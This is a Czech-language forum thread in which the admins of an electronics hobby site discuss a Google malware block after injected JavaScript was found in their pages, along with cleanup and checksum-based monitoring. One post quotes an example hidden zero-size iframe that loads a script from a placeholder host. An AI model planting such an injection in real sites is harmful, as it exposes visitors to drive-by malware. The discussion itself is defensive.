Založen: May 30, 2006 Příspěvky: 6558 Bydliště: Seč
Zaslal: út září 17 2013, 0:06 Předmět:
Že by se sem někdo zase nabořil? No, mně, co by linuxákovi, to žíly fakt nerve. Ale kouknu na kód. _________________ Kdo není ve dvaceti levičák, nemá srdce,
kdo je levičák ve čtyřiceti, nemá rozum.
— Winston Churchill
Založen: Sep 10,
2004 Příspěvky: 19927 Bydliště: Jičín, Český ráj
Zaslal: út září 17 2013, 4:57 Předmět:
Vypadá to, že Google změnil stupeň důvěryhodnosti, takže vyžaduje snížit stupeň ochrany našich prohlížečů vypnutím blokování nahlášených útočných stránek.
Teď je otázka, jestli byla hrozba z Bastlírny skutečná (musel by tu být vložený odkaz na nebezpečné stránky), nebo jde o falešné hlášení.
Pravda, nestíhám kontrolovat všechna témata, natož všechny odkazy, ale i tak jich stíhám dost a na dvou počítačích neřval ani Avast Endpoint Protection Plus ani Norton (oba v plné a trvale aktualizované licenci).
Zkrátka víme o tom a pracuje se na tom.
Minulý týden jsem odstraňoval škodlivý kód, který byl někým přidán do záhlaví hlavní stránky a hlavní stránky fóra. Jednalo se o nějaký javascript, který se automaticky spouštěl v prohlížeči při rozjetí stránky. Antiviry to běžně zachytili.
To je pravda - ja mám na stránke , kde chodí max 5 ludí tiež momentálne vyhodené - blokovaná stránka - Dôvod: Bola detekovaná hrozba (JS.IFrame.425)
a v navštevách stránky mám takéto niečo.... google-proxy-66-249-83-7.google.com - 20 návštev v priebehu týždňa.
Založen: Jul 21, 2006 Příspěvky: 25741 Bydliště: skoro Brno
Zaslal: út září 17 2013, 12:11 Předmět:
Protože odkaz na případný vir vede ze stránek EB, blokl paranoidní Google celou EB a spustil lavinu. Poslal jsem žádost o odstranění varování, s jejich rychlostí je to tak na týden.
Počet možných zjištěných útoků : 2
Jim je úplně jedno, koho a jak poškodí.
A další hlášení od Google : Googlebot found an extremely high number of URLs on your site. Co je jim do toho ?
Nejspíš je Google sám adept na BAN.
V případě lidí, co mají přístup do databáze či administrace či ftp nás čeká změna hesel, už nad nějakým přemýšlejte.
Alovko, a ty prosím ulož logy přístupů, když něco takovýho objevíš. _________________ Pro moje oslovení klidně použijte jméno Zdeněk
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?]
Naposledy upravil ZdenekHQ dne út září 17 2013, 14:57, celkově upraveno 1 krát.
Založen: Mar 21, 2006 Příspěvky: 34871 Bydliště: Bratislava
Zaslal: út září 17 2013, 12:22 Předmět:
Google takto predsa "chrani" pouzivatelov. Nechava si z browseru (Firefox) posielat kazde URL a ak je na blackliste, tak browser zobrazi varovanie. Je to akoze pre dobro pouzivatelov. A Google len tak mimochodom sleduje, kto kam chodi a moze zablokovat lubovolny web...
Založen: May 30, 2006 Příspěvky: 6558 Bydliště: Seč
Zaslal: út září 17 2013, 12:45 Předmět:
alovka napsal(a):
Minulý týden jsem odstraňoval škodlivý kód, který byl někým přidán do záhlaví hlavní stránky a hlavní stránky fóra. Jednalo se o nějaký javascript, který se automaticky spouštěl v prohlížeči při rozjetí stránky. Antiviry to běžně zachytili.
Tak to bych udělal zálohu statických objektů, jejich kontrolní součty, ty pak periodicky kontroloval, a při neshodě nahradil modifikovaný soubory souborama ze zálohy, a přidaný soubory smazal. Tohle by měl umět třeba rsync. Změny by se pak měly provádět na stroji, kde je záloha.
Pokud někdo pozmění statickej obsah fóra, pak, když se bude kontrola provádět každou půlhodinu, útočníkův projev bude mít životnost při obrovský dávce štěstí právě onu hodinu. _________________ Kdo není ve dvaceti levičák, nemá srdce,
kdo je levičák ve čtyřiceti, nemá rozum.
— Winston Churchill
Založen: Jul 21, 2006 Příspěvky: 25741 Bydliště: skoro Brno
Zaslal: út září 17 2013, 12:53 Předmět:
Blbý je, že já jsem to už několikrát v minulých dnech kontroloval a vir veškerý žádný. Jestli byl i na EB a Alovka ho smázal, pak jsem to přehlédl, neboť už delší dobu řeším jednu stále více blbnoucí ženskou na hraně těžké závislosti na PC hrách versus jedno malé dítě, což je v podstatě každodenní problém, který se stále zhoršuje.
Google třeba hlásí příliš mnoho URL z adresy /ftp/, kam má přes robots.txt zakázaný chodit (a ví to) a naopak si stěžuje na neexistenci adresy http://www.ebastlirna.cz/forum/showthread.php3?threadid=255 a žádá vyřešení, i když je to link starej jak existence EB samotná. _________________ Pro moje oslovení klidně použijte jméno Zdeněk
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?]
Založen: May 30, 2006 Příspěvky: 6558 Bydliště: Seč
Zaslal: út září 17 2013, 13:01 Předmět:
Tam žádnej virus bejt nemusí, bylo by to moc okatý, stačí neškodnej JS, kterej si škodlivej kód stáhne odjinud. Nebo blbej iframe, okno do jinýho serveru. Vždyť co by měl vidět antivirák na tom, že kdesi v kódu fóra přibyl řádek viz dole?
<iframe src="http://www.server.tld/soubor.js" width="0" height="0"></iframe> _________________ Kdo není ve dvaceti levičák, nemá srdce,
kdo je levičák ve čtyřiceti, nemá rozum.
— Winston Churchill
Založen: Jul 21, 2006 Příspěvky: 25741 Bydliště: skoro Brno
Zaslal: út září 17 2013, 13:47 Předmět:
Pro mě je na EB virus jakýkoliv js kód, co neznám.
A příliš mnoho stránek je druhý problém, jen se to jaksi sešlo. Navíc si stěžoval getmefiles.net na přímé linky z EB, ty jsem deaktivoval.
Kdoví, jak se to všechno v Google poskládalo do sebe. _________________ Pro moje oslovení klidně použijte jméno Zdeněk
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?]
Ten škodlivý kód byl přímo v header.php a ještě v jednom skriptu, který se vkládá (include) do fóra. Mrknul jsem na datumy změny souborů a šlo to najít hned. Byl tam přímo nakopírovaný jeho celý zdrojový kód asi 3kB.
Časy uváděny v GMT + 1 hodina Jdi na stránku 1, 2Další
Strana 1 z 2
Můžete přidat nové téma do tohoto fóra. Můžete odpovídat na témata v tomto fóru. Nemůžete upravovat své příspěvky v tomto fóru. Nemůžete mazat své příspěvky v tomto fóru. Nemůžete hlasovat v tomto fóru. Můžete k příspěvkům připojovat soubory Můžete stahovat a prohlížet přiložené soubory
Informace na portálu Elektro bastlírny jsou prezentovány za účelem vzdělání čtenářů a rozšíření zájmu o elektroniku. Autoři článků na serveru neberou žádnou zodpovědnost za škody vzniklé těmito zapojeními. Rovněž neberou žádnou odpovědnost za případnou újmu na zdraví vzniklou úrazem elektrickým proudem. Autoři a správci těchto stránek nepřejímají záruku za správnost zveřejněných materiálů. Předkládané informace a zapojení jsou zveřejněny bez ohledu na případné patenty třetích osob. Nároky na odškodnění na základě změn, chyb nebo vynechání jsou zásadně vyloučeny. Všechny registrované nebo jiné obchodní známky zde použité jsou majetkem jejich vlastníků. Uvedením nejsou zpochybněna z toho vyplývající vlastnická práva. Použití konstrukcí v rozporu se zákonem je přísně zakázáno. Vzhledem k tomu, že původ předkládaných materiálů nelze žádným způsobem dohledat, nelze je použít pro komerční účely! Tento nekomerční server nemá z uvedených zapojení či konstrukcí žádný zisk. Nezodpovídáme za pravost předkládaných materiálů třetími osobami a jejich původ. V případě, že zjistíte porušení autorského práva či jiné nesrovnalosti, kontaktujte administrátory na diskuzním fóru EB.